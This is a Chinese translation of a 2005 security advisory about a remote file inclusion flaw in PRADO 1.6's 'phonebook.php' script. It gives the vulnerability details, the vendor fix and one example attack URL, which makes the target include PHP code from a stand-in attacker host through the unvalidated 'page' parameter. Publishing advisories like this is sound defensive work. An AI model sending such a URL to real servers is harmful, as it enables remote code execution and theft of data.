[翻译]PRADO 'phonebook.php'文件包含缺陷允许远程用户执行任意命
本文作者: 剑心[B.C.T]文章出处: 原创翻译
翻译网站: [url]http://www.bnso.net/[/url]
安全公告:1012813
公告地址:[url]http://securitytracker.com/id?1012813[/url]
更新日期:2005.1.10
首发日期:2005.1.10
漏洞危害:通过网络执行任意代码,敏感信息泄露
漏洞修补:可以
漏洞利用:可以
厂商确认:是
软件版本:1.6
漏洞描述:Paul Brereton在PRADO中发现了一个漏洞。一个远程用户可以在目标 系统上执行任意代码。
'phonebook.php'脚本没有验证用户提供的'page'变量。远程用户可以发送一个精心构造的URL导致在远程服务器包含任意的Php代码,并且在目标系统上执行它们。任意的php代码包刮操作系统的命令,都将以目标服务器上的web服务权限运行。
攻击示例:
http://[target]/examples/phonebook.php?page=http://[attacker]/evilco de.txt%00&filter=P
已经告知厂商。
漏洞影响:远程用户以web服务进程权限在目标系统上执行任意的Php代码,包刮一些操作系统命令。
解决办法:厂商已经发布修补版本。
[url]http://sourceforge.net/project/showfiles.php?group_id=118087[/url]
厂商地址:[url]www.xisc.com/[/url]
漏洞原因:输入验证错误。
系统平台:任意Unix,Linux及windows版本
漏洞发布:SecuriTeam <[email]support@securiteam.com[/email]>
相关记录:无
页:
[1]